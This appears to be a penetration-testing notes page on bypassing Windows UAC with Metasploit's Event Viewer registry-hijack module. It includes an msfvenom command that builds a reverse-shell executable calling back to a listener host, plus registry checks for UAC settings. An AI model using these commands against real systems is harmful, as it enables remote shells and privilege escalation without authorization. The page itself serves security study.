ByPass UAC Metasploit

Spawning SHells

msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.50.50.50 LPORT=3333 -f exe -o reverse_3333.exe

Confirm this by reading the registry.

C:\BypassUAC>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableInstallerDetection    REG_DWORD    0x1
    EnableLUA    REG_DWORD    0x1
    EnableSecureUIAPaths    REG_DWORD    0x1
    EnableUIADesktopToggle    REG_DWORD    0x0
    EnableVirtualization    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    ValidateAdminCodeSignatures    REG_DWORD    0x0
    dontdisplaylastusername    REG_DWORD    0x0
    legalnoticecaption    REG_SZ    
    legalnoticetext    REG_SZ    
    scforceoption    REG_DWORD    0x0
    shutdownwithoutlogon    REG_DWORD    0x1
    undockwithoutlogon    REG_DWORD    0x1
    FilterAdministratorToken    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\UIPI

Now notice the three highlighted keys above and their values.

EnableLUA tells us whether UAC is enabled. If 0 we don’t need to bypass it at all can just PsExec to SYSTEM. If it’s 1 however, then check the other 2 keys
PromptOnSecureDesktop is binary, either 0 or 1.

Now I’ll use an exploit to bypass UAC but note that it works only when the slider is set to default value or lower (in which case we don’t need to bypass it). At ‘Always notify’, in which case ConsentPromptBehaviorAdmin = 2 and PromptOnSecureDesktop = 1, not even this works. Take note of these limitations.

In Metasploit the exploit is

       Name: Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
     Module: exploit/windows/local/bypassuac_eventvwr
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-08-15

Provided by:
  Matt Nelson
  Matt Graeber
  OJ Reeves

Available targets:
  Id  Name
  --  ----
  0   Windows x86
  1   Windows x64

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module will bypass Windows UAC by hijacking a special key in 
  the Registry under the current user hive, and inserting a custom 
  command that will get invoked when the Windows Event Viewer is 
  launched. It will spawn a second shell that has the UAC flag turned 
  off. This module modifies a registry key, but cleans up the key once 
  the payload has been invoked. The module does not require the 
  architecture of the payload to match the OS. If specifying 
  EXE::Custom your DLL should call ExitProcess() after starting your 
  payload in a separate process.

PreviousEventVwr Bypass UAC Powershell NextBypassing UAC with Kali’s bypassuac

Last updated 3 years ago

Was this helpful?

C:\BypassUAC>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System ConsentPromptBehaviorAdmin REG_DWORD 0x5 ConsentPromptBehaviorUser REG_DWORD 0x3 EnableInstallerDetection REG_DWORD 0x1 EnableLUA REG_DWORD 0x1 EnableSecureUIAPaths REG_DWORD 0x1 EnableUIADesktopToggle REG_DWORD 0x0 EnableVirtualization REG_DWORD 0x1 PromptOnSecureDesktop REG_DWORD 0x1 ValidateAdminCodeSignatures REG_DWORD 0x0 dontdisplaylastusername REG_DWORD 0x0 legalnoticecaption REG_SZ legalnoticetext REG_SZ scforceoption REG_DWORD 0x0 shutdownwithoutlogon REG_DWORD 0x1 undockwithoutlogon REG_DWORD 0x1 FilterAdministratorToken REG_DWORD 0x0 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\UIPI

Name: Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) Module: exploit/windows/local/bypassuac_eventvwr Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2016-08-15 Provided by: Matt Nelson Matt Graeber OJ Reeves Available targets: Id Name -- ---- 0 Windows x86 1 Windows x64 Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload information: Description: This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.